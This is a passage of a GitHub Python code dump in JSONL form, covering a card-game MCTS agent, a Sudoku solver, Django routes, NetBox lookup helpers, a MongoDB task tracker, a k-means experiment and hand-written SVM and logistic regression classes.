curr_node.select_action_by_value()\n\n # try:\n # ruler = state.ruler\n # kvs = list(self.root_node.children.items())\n # values = [kv[1].sim_count for kv in kvs]\n # sort_idxs = np.argsort(values)[::-1]\n # debug_str = []\n # for idx in sort_idxs:\n # child = kvs[idx][1]\n # debug_str.append(' {},{:.0f},{:.0f},{:.0f},{:.0f}'.format(ruler.get_codes_repr(kvs[idx][0]),child.sim_count,child.sim_value,child.predict_value,child.get_select_value(np.sqrt(self.root_node.sim_count))))\n \n # debug_str = ';'.join(debug_str)\n # print(counts,debug_str)\n # except Exception:\n # pass\n \n if len(nodes_queue) > 0:\n self.predict_node_batch(nodes_queue)\n nodes_queue = []\n\n if self.infer_flag:\n temp = 0\n else:\n if state.round_ >= 10:\n temp = 0\n else:\n temp = self.temp * (1 - state.round_ / 10.0)\n\n a_idx,action,a_probs,q_values = self.root_node.select_action_by_count_aug(temp=temp)\n # _,_,a_probs,q_values = self.root_node.select_action_by_count_aug(temp=1)\n\n if self.debug_flag:\n # print(state.round_,self.root_node.child_probs)\n # print(state.round_,a_probs,temp)\n\n try:\n ruler = state.ruler\n kvs = list(self.root_node.children.items())\n values = [kv[1].sim_count for kv in kvs]\n sort_idxs = np.argsort(values)[::-1]\n debug_str = []\n for idx in sort_idxs[:5]:\n child = kvs[idx][1]\n debug_str.append(' {}-->N:{:d},V:{:.0f},{:.0f},p:{:.2f},{:.2f}'.format(ruler.get_codes_repr(kvs[idx][0]),child.sim_count,child.sim_value,child.predict_value,a_probs[idx],child.pc/self.c_puct))\n \n debug_str = ';'.join(debug_str)\n print(debug_str)\n except Exception:\n pass\n\n if self.sample_collect_flag:\n state_vec,actions_vec,direc = self.root_node.state.get_vecs()\n\n self.samples_partial_cache.append((state_vec,actions_vec,direc,state.eval_score,a_probs,q_values))\n # ## policy samples: P(state,actions,direc) -> action_probs\n # self.policy_samples_cache.append((state_vec,actions_vec,direc,a_probs))\n # ## value samples: Q(state,action) -> final reward - current reward\n # ## only init parts here; append the final reward at the end of the game\n # self.value_samples_partial_cache.append((state_vec,actions_vec[:,a_idx],state.eval_score))\n \n return action\n","repo_name":"hanqiu92/shengji","sub_path":"public_full/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":21759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"24168503357","text":"class Solution:\n def solveSudoku(self, board: List[List[str]]) -> None:\n def backtrack(board):\n for i in range(len(board)): # 遍历行\n for j in range(len(board[0])): # 遍历列\n if board[i][j] != \".\":\n continue\n for k in range(1, 10): # (i, j) 这个位置放k是否合适\n if isValid(i, j, k, board):\n board[i][j] = str(k) # 放置k\n if backtrack(board): return True # 如果找到合适一组立刻返回\n board[i][j] = \".\" # 回溯,撤销k\n return False # 9个数都试完了,都不行,那么就返回false\n return True # 遍历完没有返回false,说明找到了合适棋盘位置了\n\n def isValid(row, col, val, board):\n for i in range(9): # 判断行里是否重复\n if board[row][i] == str(val):\n return False\n for j in range(9): # 判断列里是否重复\n if board[j][col] == str(val):\n return False\n startRow = (row // 3) * 3\n startcol = (col // 3) * 3\n for i in range(startRow, startRow + 3): # 判断9方格里是否重复\n for j in range(startcol, startcol + 3):\n if board[i][j] == str(val):\n return False\n return True\n\n backtrack(board)","repo_name":"myf-algorithm/Leetcode","sub_path":"Leetcode/37.解数独.py","file_name":"37.解数独.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"37437546788","text":"from django.conf.urls import url\r\nfrom .views import KalendarListView, DayNoUpdateView, EventCreateView, EventUpdateView, SchoolKalendarTemplateView\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\nurlpatterns = [\r\n\turl(r'^$', KalendarListView.as_view(), name='kalendar-list-view'),\r\n\turl(r'^school/$', SchoolKalendarTemplateView.as_view(), name='school_kalendar-template-view'),\r\n url(r'^(?P\\d{4})/(?P\\d{1,2})$', KalendarListView.as_view(), name='kalendar-view'),\t#if sent with month, day etc.\r\n url(r'^changeday/(?P\\d+)/$', DayNoUpdateView.as_view(), name='dayno-update-view'),\r\n url(r'^addevent/(?P\\d+)/$', EventCreateView.as_view(), name='event-create-view'),\r\n url(r'^changeevent/(?P\\d+)/$', EventUpdateView.as_view(), name='event-update-view'),\r\n ]\r\n","repo_name":"personnameds/classsite","sub_path":"kalendar/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42795768547","text":"import pynetbox\nimport config\n\nnetbox = pynetbox.api(url=config.URL_NB, token=config.TOKEN_NB)\n\ndef check_manufacs(manufact_name):\n \"\"\"\n Từ thông tin manufacturers trả về thông tin id của manufacturers,\n nếu thông tin manufacturer trống, tạo manufacturer\n \"\"\"\n import create_manufacturers\n manufact_info = netbox.dcim.manufacturers.get(name=\"{}\" .format(manufact_name))\n if manufact_info == None:\n create_manufacturers.create_manufacs_main()\n manufact_info1 = netbox.dcim.manufacturers.get(name=\"{}\" .format(manufact_name))\n manufact_id = manufact_info1['id']\n else:\n manufact_id = manufact_info['id']\n return manufact_id\n\ndef check_tenants(tenant_name):\n \"\"\"\n Từ thông tin tenants trả về thông tin id của tenants,\n nếu thông tin tenants trống, tạo tenants\n \"\"\"\n from create_tenancy import create_tenants_main\n tenant_info = netbox.tenancy.tenants.get(name=\"{}\" .format(tenant_name))\n if tenant_info == None:\n create_tenants_main()\n tenant_info1 = netbox.tenancy.tenants.get(name=\"{}\" .format(tenant_name))\n tenant_id = tenant_info1['id']\n else:\n tenant_id = tenant_info['id']\n return tenant_id\n\ndef check_sites(site_name):\n \"\"\"\n Từ thông tin sites trả về thông tin id của sites,\n nếu thông tin sites trống, tạo sites\n \"\"\"\n import create_sites\n site_info = netbox.dcim.sites.get(name=\"{}\" .format(site_name))\n if site_info == None:\n create_sites.create_site_main()\n site_info1 = netbox.dcim.sites.get(name=\"{}\" .format(site_name))\n site_id = site_info1['id']\n else:\n site_id = site_info['id']\n return site_id\n\ndef check_regions(region_name):\n \"\"\"\n Từ thông tin regions trả về thông tin id của regions,\n nếu thông tin regions trống, tạo regions\n \"\"\"\n from create_regions import create_region_main\n region_info = netbox.dcim.regions.get(name=\"{}\" .format(region_name))\n if region_info == None:\n create_region_main()\n region_info1 = netbox.dcim.regions.get(name=\"{}\" .format(region_name))\n region_id = region_info1['id']\n else:\n region_id = region_info['id']\n return region_id\n\ndef check_racks(rack_name):\n \"\"\"\n Từ thông tin racks trả về thông tin id của racks,\n nếu thông tin racks trống, tạo racks\n \"\"\"\n import create_racks\n rack_info = netbox.dcim.racks.get(name=\"{}\" .format(rack_name))\n if rack_info == None:\n create_racks.create_rack_main()\n rack_info1 = netbox.dcim.racks.get(name=\"{}\" .format(rack_name))\n rack_id = rack_info1['id']\n else:\n rack_id = rack_info['id']\n return rack_id\n\ndef check_rack_roles(role_name):\n \"\"\"\n Từ thông tin Rack roles trả về thông tin id của Rack roles,\n nếu thông tin Rack roles trống, tạo Rack roles\n \"\"\"\n import create_rack_roles\n rack_role_info = netbox.dcim.rack_roles.get(name=\"{}\" .format(role_name))\n if rack_role_info == None:\n create_rack_roles.create_rack_role_main()\n rack_role_info1=netbox.dcim.rack_roles.get(name=\"{}\" .format(role_name))\n rack_role_id = rack_role_info1['id']\n else:\n rack_role_id = rack_role_info['id']\n return rack_role_id\n\ndef check_rack_group(group_name, site):\n \"\"\"\n Từ thông tin Rack group trả về thông tin id của Rack group,\n nếu thông tin Rack group trống, tạo Rack group\n \"\"\"\n from create_rack_groups import create_rack_group_main\n rack_group_info = netbox.dcim.rack_groups.get(name=\"{}\" .format(group_name), site_id= site)\n if rack_group_info == None:\n create_rack_group_main()\n rack_group_info1 = netbox.dcim.rack_groups.get(name=\"{}\" .format(group_name), site_id= site)\n rack_group_id = rack_group_info1['id']\n else:\n rack_group_id = rack_group_info['id']\n return rack_group_id\n\ndef check_device_types(manufact_id, device_model):\n \"\"\"\n Từ thông tin Device type trả về thông tin id của Device type,\n nếu thông tin Device type trống, tạo Device type\n \"\"\"\n import create_device_types\n import create_interface_tpl\n device_type_info = netbox.dcim.device_types.get(manufacturer_id='{}' .format(manufact_id), model='{}' .format(device_model))\n if device_type_info == None:\n create_device_types.create_device_type_main()\n create_interface_tpl.create_inf_template_main()\n device_type_info1 = netbox.dcim.device_types.get(manufacturer_id='{}' .format(manufact_id), model='{}' .format(device_model))\n device_type_id = device_type_info1['id']\n else:\n device_type_id = device_type_info['id']\n return device_type_id\n\ndef check_device_roles(role_name):\n \"\"\"\n Từ thông tin Device role trả về thông tin id của Device role,\n nếu thông tin Device role trống, tạo Device role\n \"\"\"\n import create_device_roles\n device_role_info = netbox.dcim.device_roles.get(name=\"{}\" .format(role_name))\n if device_role_info == None:\n create_device_roles.create_device_role_main()\n device_role_info1 = netbox.dcim.device_roles.get(name=\"{}\" .format(role_name))\n device_role_id = device_role_info1['id']\n else:\n device_role_id = device_role_info['id']\n return device_role_id\n\ndef check_platforms(name):\n \"\"\"\n Từ thông tin platforms trả về thông tin id của platforms,\n nếu thông tin platforms trống, tạo platforms\n \"\"\"\n import create_platforms\n platform_info = netbox.dcim.platforms.get(name=\"{}\" .format(name))\n if platform_info == None:\n create_platforms.create_platforms_main()\n platform_info1 = netbox.dcim.platforms.get(name=\"{}\" .format(name))\n platform_id = platform_info1['id']\n else:\n platform_id = platform_info['id']\n return platform_id\n\ndef check_position_racks(rack_id):\n \"\"\"\n Kiểm tra vị trí còn trống trên tủ rack\n \"\"\"\n device_used = []\n check_device_in_racks = netbox.dcim.devices.filter(rack_id='{}' .format(rack_id))\n for device in check_device_in_racks:\n # Lấy ra các device đang đặt trên rack và lưu vào device_used\n if device not in device_used:\n device_used.append(device)\n position_used = []\n for deivce_name in device_used:\n # Lấy ra các vị trí u đã sử dụng và lưu vào position_used\n device_info = netbox.dcim.devices.get(name='{}' .format(deivce_name))\n position = device_info['position']\n manufact_id = device_info['device_type']['manufacturer']['id']\n device_model = device_info['device_type']['model']\n device_type_info = netbox.dcim.device_types.get(manufacturer_id='{}' .format(manufact_id), model='{}' .format(device_model))\n u_height = device_type_info['u_height']\n if ((position not in position_used) and ((position+u_height-1) not in position_used)): \n position_used.extend(range (position, position+u_height))\n else:\n print(\"Vị Trí {} Đã Có Thiết Bị Được Đặt\" .format(position))\n return position_used\n\ndef check_vlan_group(vgroup_name):\n \"\"\"\n Từ thông tin vlan group trả về thông tin id của vlan group,\n nếu thông tin vlan group trống, tạo vlan group\n \"\"\"\n import create_vlan_groups\n vlan_group_info = netbox.ipam.vlan_groups.get(name=\"{}\" .format(vgroup_name))\n if vlan_group_info == None:\n create_vlan_groups.create_vlan_group_main()\n vlan_group_info1 = netbox.ipam.vlan_groups.get(name=\"{}\" .format(vgroup_name))\n vlan_group_id = vlan_group_info1['id']\n else:\n vlan_group_id = vlan_group_info['id']\n return vlan_group_id\n\ndef check_vlan(vlan_name, site_id):\n \"\"\"\n Từ thông tin vlan trả về thông tin id của vlan,\n nếu thông tin vlantrống, tạo vlan\n \"\"\"\n import create_vlans\n vlan_info = netbox.ipam.vlans.get(name=\"{}\" .format(vlan_name), site_id = \"{}\" .format(site_id))\n if vlan_info == None:\n create_vlans.create_vlan_main()\n vlan_info1 = netbox.ipam.vlans.get(name=\"{}\" .format(vlan_name), site_id = \"{}\" .format(site_id))\n vlan_id = vlan_info1['id']\n else:\n vlan_id = vlan_info['id']\n return vlan_id\n\ndef check_rir(rir_name):\n \"\"\"\n Từ thông tin rir trả về thông tin id của rir,\n nếu thông tin rir trống, tạo rir\n \"\"\"\n import create_rirs\n rir_info = netbox.ipam.rirs.get(name=\"{}\" .format(rir_name))\n if rir_info == None:\n create_rirs.create_rir_main()\n rir_info1 = netbox.ipam.rirs.get(name=\"{}\" .format(rir_name))\n rir_id = rir_info1['id']\n else:\n rir_id = rir_info['id']\n return rir_id\n\ndef check_prefix_role(role_name):\n \"\"\"\n Từ thông tin prefix role trả về thông tin id của prefix role,\n nếu thông tin prefix role trống, tạo prefix role\n \"\"\"\n import create_prefixe_roles\n prefix_role_info = netbox.ipam.roles.get(name=\"{}\" .format(role_name))\n if prefix_role_info == None:\n create_prefixe_roles.create_prefix_role_main()\n prefix_role_info1 = netbox.ipam.roles.get(name=\"{}\" .format(role_name))\n role_id = prefix_role_info1['id']\n else:\n role_id = prefix_role_info['id']\n return role_id\n\ndef check_interface(device_name, inf_name):\n \"\"\"\n Từ thông tin interface trên device trả về thông tin id của interface\n \"\"\"\n try:\n interface_info = netbox.dcim.interfaces.get(device='{}' .format(device_name), name='{}' .format(inf_name))\n interface_id = interface_info['id']\n return interface_id\n except Exception as ex:\n print(ex)","repo_name":"VNPT-SmartCloud-System/Tim-hieu-Netbox","sub_path":"netbox_create_data/core/check_data_netbox.py","file_name":"check_data_netbox.py","file_ext":"py","file_size_in_byte":9822,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"11054804202","text":"from datetime import datetime\nimport bson.json_util\nfrom bson.json_util import dumps, loads\nimport json\nfrom dbconfig import users, tasks\n\nUSER_SCHEMA = {\n \"_id\": \"60756d56c44fb6fd55337f82\",\n \"user_id\": 1,\n \"name\": \"jondoe\",\n\n}\nSTATUS = [\"Pending\", \"InProgress\", \"InReview\", \"Completed\"]\n\nTASKS_SCHEMA = {\n \"title\": \"this is a task title\",\n \"description\": \"this is a task description\",\n \"current_status\": STATUS[0],\n \"ETA\": \"send-date-time of completion\",\n \"Assignee\": \"someone\",\n \"PENDING\": \"datetime.now()\",\n \"INPROGRESS\": \"datetime.now()\",\n \"INREVIEW\": \"datetime.now()\",\n \"COMPLETED\": \"datetime.now()\",\n}\n\nUPDATE_TASK_STATUS_SCHEMA = {\n \"title\": \"this is a task title\",\n \"description\": \"this is a task description\",\n \"ETA\": \"sometime\",\n \"current_status\": STATUS[2],\n \"timestamp\": datetime.now(),\n}\nUPDATE_TASK_SCHEMA = {\n \"title\": \"this is a task title\",\n \"description\": \"this is a task description\",\n \"Assignee\":\"haha\",\n \"ETA\": datetime.now(),\n \"timestamp\": datetime.now(),\n}\n\n\ndef add_task(task):\n query = {\"title\": task['title']}\n if tasks.count_documents(query) == 1:\n return None\n x = tasks.insert_one(task)\n x = tasks.update_one(query, {\n \"$set\": {\"current_status\": task[\"current_status\"], \"PENDING\": datetime.now()}})\n return task\n\n\n# print(add_task(TASKS_SCHEMA))\n\ndef show_task():\n task = tasks.find({})\n list_task = list(task)\n json_data = dumps(list_task)\n # print(task)\n new_dict = []\n for x in tasks.find({}):\n new_dict.append(x)\n # print(x)\n\n # print(new_dict)\n new_dict = json.loads(bson.json_util.dumps(new_dict))\n return new_dict\n\n\n# print(show_task())\n\n\ndef update_task_status(task):\n query = {\"title\": task[\"title\"]}\n if tasks.count_documents(query) == 1:\n x = tasks.update_one(query, {\n \"$set\": {\"current_status\": task[\"current_status\"], task[\"current_status\"]: datetime.now()}})\n return task\n\n\ndef update_task(task):\n query = {\"title\": task[\"title\"]}\n if tasks.count_documents(query) == 1:\n x = tasks.update_one(query, {\n \"$set\": {\"ETA\": task[\"ETA\"], \"Assignee\": task[\"Assignee\"]}})\n return task\n\n\n# print(update_task(UPDATE_TASK_SCHEMA))\n","repo_name":"chirayupatel9/SEFS","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"73698282141","text":"\"\"\"\r\nCreated on 2023/09/11\r\n@author: huguet\r\n\"\"\"\r\nimport os\r\nos.environ[\"OMP_NUM_THREADS\"] = '4'\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\nfrom scipy.io import arff\r\nfrom sklearn import cluster\r\nfrom sklearn import metrics\r\n\r\n# Chargement des données\r\npath = './artificial/'\r\nname = \"2d-4c.arff\"\r\ndatabrut = arff.loadarff(open(path + str(name), 'r'))\r\ndatanp = np.array([[x[0], x[1]] for x in databrut[0]])\r\n\r\n# Affichage des données initiales en 2D\r\nprint(\"---------------------------------------\")\r\nprint(\"Affichage données initiales \" + str(name))\r\nf0 = datanp[:, 0]\r\nf1 = datanp[:, 1]\r\nplt.scatter(f0, f1, s=8)\r\nplt.title(\"Donnees initiales : \" + str(name))\r\nplt.show()\r\n\r\n# Application de KMeans pour une valeur de k fixée\r\nprint(\"------------------------------------------------------\")\r\nprint(\"Appel KMeans pour une valeur de k fixée\")\r\ntps1 = time.time()\r\nk = 4\r\nmodel = cluster.KMeans(n_clusters=k, init='k-means++', n_init=1)\r\nmodel.fit(datanp)\r\ntps2 = time.time()\r\nlabels = model.labels_\r\niteration = model.n_iter_\r\ninertie = model.inertia_\r\ncentroids = model.cluster_centers_\r\n\r\n# Affichage des données après clustering\r\nplt.scatter(f0, f1, c=labels, s=8)\r\nplt.scatter(centroids[:, 0], centroids[:, 1], marker=\"x\", s=50, linewidths=3, color=\"red\")\r\nplt.title(\"Données après clustering : \" + str(name) + \" - Nb clusters =\" + str(k))\r\nplt.show()\r\n\r\n# Affichage des informations sur le clustering\r\nprint(\"nb clusters =\", k, \", nb iter =\", iteration, \", inertie = \", inertie, \", runtime = \", round((tps2 - tps1) * 1000, 2), \"ms\")\r\n\r\n# Calcul des distances entre les centroids\r\ndists = metrics.pairwise.euclidean_distances(centroids)\r\nmin_distances = dists.min(axis=1)\r\nmax_distances = dists.max(axis=1)\r\nmean_distances = dists.mean(axis=1)\r\n\r\n# Calcul des distances de chaque point aux centroids\r\npoint_to_centroid_dists = metrics.pairwise.euclidean_distances(datanp, centroids)\r\n\r\n# Affichage des distances pour chaque cluster\r\nfor i in range(k):\r\n cluster_point_dists = point_to_centroid_dists[labels == i, i]\r\n print(f\"Cluster {i + 1} - Min distance: {cluster_point_dists.min():.2f}, Max distance: {cluster_point_dists.max():.2f}, Mean distance: {cluster_point_dists.mean():.2f}\")\r\n\r\n# Calcul des scores de séparation entre clusters\r\ncentroid_distances = metrics.pairwise.pairwise_distances(centroids)\r\nlower_triangle = np.tril(centroid_distances, -1)\r\nnon_zero_values = lower_triangle[lower_triangle > 0]\r\nprint(f\"Separation between clusters - Min distance: {non_zero_values.min():.2f}, Max distance: {non_zero_values.max():.2f}, Mean distance: {non_zero_values.mean():.2f}\")\r\n\r\n# Calcul et affichage de l'évolution de l'inertie en fonction du nombre de clusters\r\ninertia_values = []\r\nfor k in range(1, 11):\r\n model = cluster.KMeans(n_clusters=k, init='k-means++')\r\n model.fit(datanp)\r\n inertia_values.append(model.inertia_)\r\n\r\nplt.figure()\r\nplt.plot(range(1, 11), inertia_values, marker='o')\r\nplt.title('Evolution de l\\'inertie')\r\nplt.xlabel('Nombre de clusters')\r\nplt.ylabel('Inertie')\r\nplt.show()\r\n\r\n# Évaluation de la qualité du clustering pour différents nombres de clusters\r\nk_values = range(2, 11)\r\nsilhouette_scores = []\r\ndavies_bouldin_scores = []\r\ncalinski_harabasz_scores = []\r\n\r\n# Calcul des métriques pour chaque nombre de clusters\r\nfor k in k_values:\r\n model = cluster.KMeans(n_clusters=k, init='k-means++')\r\n labels = model.fit_predict(datanp)\r\n silhouette_scores.append(metrics.silhouette_score(datanp, labels))\r\n davies_bouldin_scores.append(metrics.davies_bouldin_score(datanp, labels))\r\n calinski_harabasz_scores.append(metrics.calinski_harabasz_score(datanp, labels))\r\n\r\n# Affichage des métriques\r\nplt.figure(figsize=(10, 8))\r\nplt.subplot(3, 1, 1)\r\nplt.plot(k_values, silhouette_scores, marker='o', label='Coefficient de Silhouette', color='red')\r\nplt.legend()\r\nplt.title('Évaluation de la qualité du clustering en fonction de k')\r\nplt.ylabel('Coefficient de Silhouette')\r\n\r\nplt.subplot(3, 1, 2)\r\nplt.plot(k_values, davies_bouldin_scores, marker='x', label='Indice de Davies-Bouldin', color='green')\r\nplt.legend()\r\nplt.ylabel('Indice de Davies-Bouldin')\r\n\r\nplt.subplot(3, 1, 3)\r\nplt.plot(k_values, calinski_harabasz_scores, marker='s', label='Indice de Calinski-Harabasz')\r\nplt.legend()\r\nplt.xlabel('Nombre de clusters')\r\nplt.ylabel('Indice de Calinski-Harabasz')\r\n\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n# Application de MiniBatchKMeans pour différentes configurations\r\nfrom sklearn.cluster import MiniBatchKMeans\r\n\r\nbatch_sizes = [10, 50, 100, 500]\r\nn_clusters_list = [2, 3, 4, 5]\r\nn_init = 10\r\n\r\nfor n_clusters in n_clusters_list:\r\n for batch_size in batch_sizes:\r\n model = MiniBatchKMeans(n_clusters=n_clusters, batch_size=batch_size, n_init=n_init, init='k-means++')\r\n model.fit(datanp)\r\n labels = model.labels_\r\n centroids = model.cluster_centers_\r\n silhouette = metrics.silhouette_score(datanp, labels)\r\n davies_bouldin = metrics.davies_bouldin_score(datanp, labels)\r\n calinski_harabasz = metrics.calinski_harabasz_score(datanp, labels)\r\n print(f\"Configuration: n_clusters = {n_clusters}, batch_size = {batch_size}\")\r\n print(f\"Silhouette Score: {silhouette:.3f}\")\r\n print(f\"Davies Bouldin Score: {davies_bouldin:.3f}\")\r\n print(f\"Calinski Harabasz Score: {calinski_harabasz:.3f}\")\r\n print(\"-----------------------------------\")\r\n plt.scatter(datanp[:, 0], datanp[:, 1], c=labels, s=8)\r\n plt.scatter(centroids[:, 0], centroids[:, 1], marker=\"x\", s=50, linewidths=3, color=\"red\")\r\n plt.title(f\"Données après clustering avec MiniBatchKMeans (n_clusters={n_clusters}, batch_size={batch_size})\")\r\n plt.show()\r\n","repo_name":"Sofiene29/ANS","sub_path":"2-Starting-with-k-means.py","file_name":"2-Starting-with-k-means.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7017407532","text":"import numpy as np\nimport cvxopt\nfrom tqdm import tqdm\nimport scipy\nfrom scipy.spatial.distance import pdist, squareform, cdist\nfrom scipy.special import expit\n\nclass LogisticRegression():\n\n def __init__(self):\n self.weights = None\n\n def sigmoid(self, z):\n return 1 / (1 + np.exp(-z))\n\n def predict_probas(self, X):\n z = X @ self.weights\n return self.sigmoid(z)\n\n def cross_entropy(self, X, y):\n n = X.shape[0]\n y_pred = self.predict_probas(X, self.weights)\n cost = y * np.log(y_pred) + (1 - y) * np.log(1 - y_pred)\n return cost.sum() / n\n\n def get_grad(self, X, y):\n n = X.shape[0]\n y_pred = self.predict_probas(X=X)\n\n return X.T @ (y_pred - y) / n\n\n def fit(self, X, y, max_iter=1000, lr=1, eps=1e-6):\n self.weights = np.zeros(X.shape[1])\n cv = False\n j = 1\n for i in range(max_iter):\n weights_prev = self.weights.copy()\n grad = self.get_grad(X, y)\n self.weights -= lr * grad\n if np.linalg.norm(self.weights - weights_prev, 2) < eps:\n cv =True\n print('Algorithm converged !')\n break\n if (i/10000 == j):\n lr /= 2\n j += 1\n if not(cv):\n print('Reached maximum iterations without convergence.')\n\n def predict(self, X):\n probas = self.predict_probas(X=X)\n return (probas>0.5).astype(int)\n\n def get_accuracy_score(self, X, y):\n pred_labels = self.predict(X=X)\n return (pred_labels==y).mean()\n\n\nimport cvxopt\n\n\nclass SVM_custom_kernel:\n\n def __init__(self, c=1, eps=1e-4):\n self.alpha_ = None\n self.c = c\n self.eps = eps\n\n def fit(self, kernel_train, labels):\n n = len(labels)\n\n # prepare matrices of dual problem for solving\n diag = np.zeros((n, n))\n np.fill_diagonal(diag, labels)\n\n P = diag @ kernel_train @ diag\n P = cvxopt.matrix(P)\n\n Q = cvxopt.matrix(np.ones(n) * -1)\n\n if self.c is None:\n G = cvxopt.matrix(np.diag(np.ones(n) * -1))\n h = cvxopt.matrix(np.zeros(n))\n else:\n G = cvxopt.matrix(np.vstack((np.diag(np.ones(n) * -1), np.identity(n))))\n h = cvxopt.matrix(np.hstack((np.zeros(n), np.ones(n) * self.c)))\n\n A = labels.T\n A = A.astype('double')\n A = cvxopt.matrix(A)\n b = cvxopt.matrix(0.0)\n\n # Solve QP problem using cvxopt\n u = cvxopt.solvers.qp(P, Q, G, h, A, b)\n\n # take Lagrange multipliers,\n alpha = np.ravel(u['x'])\n\n # Identify support vectors\n sv = alpha > self.eps\n ind = np.arange(len(alpha))[sv]\n\n self.alpha_ = alpha[sv]\n self.sv = np.argwhere(sv == True)\n self.sv_label = labels[sv]\n\n # Compute bias value\n self.b = 0.0\n for i in range(len(self.alpha_)):\n self.b += self.sv_label[i]\n self.b -= np.sum(self.alpha_ * self.sv_label[:, 0] * kernel_train[sv, ind[i]])\n self.b /= len(self.alpha_)\n\n def predict(self, kernel_test):\n\n y_predict = np.zeros(kernel_test.shape[1])\n\n for i in range(kernel_test.shape[1]):\n y_predict[i] = sum(alpha * sv_label * kernel_test[sv, i] for alpha, sv, sv_label in\n zip(self.alpha_, self.sv, self.sv_label[:, 0]))\n return y_predict + self.b\n\n prediction = np.sign(y_predict + self.b)\n\n return prediction\n\n def predict_class(self, kernel_test):\n\n prediction = np.array(self.predict(kernel_test) >= 0, dtype=int)\n prediction[prediction == 0] = -1\n return prediction\n\n\nclass SVMClassifier():\n\n def __init__(self, C=1, kernel='rbf', gamma=0.1):\n self.C = C\n self.kernel = kernel\n if self.kernel == 'rbf':\n self.f_kernel = self.GRBF_kernel\n self.gamma = gamma\n\n def GRBF_kernel(self, x1, x2, gamma):\n return np.exp(-np.linalg.norm(x1 - x2) * gamma)\n\n # the computation of Gram matrix will be much faster using this\n\n def get_kernel_gram_matrix(self, X, gamma):\n\n if self.kernel in ['gaussian', 'rbf']:\n # Faster computation of the gram matrix with gaussian kernel\n # st= time.time()\n pairwise_dists = squareform(pdist(X, 'sqeuclidean'))\n K = np.exp(-pairwise_dists * gamma)\n # print(time.time()-st)\n return K\n\n def fit(self, X, y, transform_y=True):\n y = y.copy()\n if transform_y:\n y = y * 2 - 1\n\n n, m = X.shape\n\n # the computation of Gram matrix will be much faster using this\n K = self.get_kernel_gram_matrix(X, self.gamma)\n\n '''K1 = np.zeros((n,n))\n for i in tqdm(range(n)):\n for j in range(n):\n K1[i, j] = self.f_kernel(X[i], X[j], gamma=self.gamma)'''\n\n\n # construct for solver\n P = cvxopt.matrix(np.outer(y, y) * K)\n q = cvxopt.matrix(np.ones(n) * -1)\n A = cvxopt.matrix(y, (1, n))\n b = cvxopt.matrix(0.0)\n if self.C is None:\n G = cvxopt.matrix(np.diag(np.ones(n) * -1))\n h = cvxopt.matrix(np.zeros(n))\n else:\n G = cvxopt.matrix(np.vstack((np.diag(np.ones(n) * -1), np.identity(n))))\n h = cvxopt.matrix(np.hstack((np.zeros(n), np.ones(n) * self.C)))\n # solve QP problem\n solution = cvxopt.solvers.qp(P, q, G, h, A, b)\n # Lagrange multipliers\n LagM = np.ravel(solution['x'])\n # Get support vectors\n self.SuppVec_indices = LagM > 1e-5\n self.supportVectors = X[self.SuppVec_indices]\n self.supportY = y[self.SuppVec_indices] * LagM[self.SuppVec_indices]\n\n def predict_probas(self, X):\n\n try:\n assert self.kernel in ['gaussian', 'rbf']\n # compute pairwise (squared euclidean) distances between new samples and support vectors\n pairwise_dists = cdist(self.supportVectors, X, 'sqeuclidean')\n # gaussian kernel evaluations\n K_pred = np.exp(-pairwise_dists * self.gamma)\n \n #fixed error: due to self.weight instead of self.supportY\n pred_probas = expit(K_pred.T @ self.supportY)\n return pred_probas\n\n except:\n print('Please make sure the used kernel is gaussian.')\n\n def predict(self, X):\n probas = self.predict_probas(X=X)\n return (probas > 0.5).astype(int)\n\n def get_accuracy_score(self, X, y):\n pred_labels = self.predict(X=X)\n return (pred_labels == y).mean()\n\n\nclass WKRR():\n \"\"\"\n Weighted Kernel Ridge Regression\n\n \"\"\"\n\n def __init__(self, kernel='gaussian'):\n self.weights = None\n self.kernel = kernel\n # kernel gram matrix over training data\n self.K_train = None\n # training samples\n self.X_train = None\n\n def get_kernel_gram_matrix(self, X, sigma):\n\n if self.kernel == 'gaussian':\n # Faster computation of the gram matrix with gaussian kernel\n # st= time.time()\n pairwise_dists = squareform(pdist(X, 'sqeuclidean'))\n K = np.exp(-pairwise_dists / (2 * np.square(sigma)))\n # print(time.time()-st)\n return K\n\n def fit(self, X, y, penalty, W=None, eps=1e-6, kernel_precomputed=False):\n \"\"\"\n Returns analytical solution of the Weighted Kernel Ridge Regression problem\n \"\"\"\n\n self.X_train = X\n if kernel_precomputed:\n K = self.K_train\n else:\n K = self.get_kernel_gram_matrix(X, self.sigma)\n self.K_train = K\n\n assert K.shape[0] == y.shape[0]\n n = K.shape[0]\n\n if W is None:\n # unweighted KLR := all weights are equal to 1 and W:=Identity\n M = K @ y + n * penalty * np.eye(n)\n M_ = scipy.linalg.inv(M)\n v = M_ @ v\n\n else:\n\n W_sqrt = np.diag(np.sqrt(np.diag(W)))\n v = W_sqrt @ y\n M = K @ W_sqrt\n M = W_sqrt @ M + n * penalty * np.eye(n)\n M_ = scipy.linalg.inv(M)\n v = M_ @ v\n v = W_sqrt @ v\n\n print('fitted train data')\n self.weights = v\n\n\nclass KernelLogisticRegression():\n \"\"\"\n Kernel Logistic regression\n \"\"\"\n\n def __init__(self, kernel='gaussian', sigma=1):\n self.weights = None\n self.kernel = 'kernel'\n self.sigma = sigma\n self.loss_thresh = 0.001\n self.X_train = None\n\n # initialize weighted kernel ridge regression for self.fit\n self.wkrr = WKRR()\n\n def get_kernel_gram_matrix(self, X, sigma):\n\n if self.kernel == 'gaussian':\n # Faster computation of the gram matrix with gaussian kernel\n # st= time.time()\n 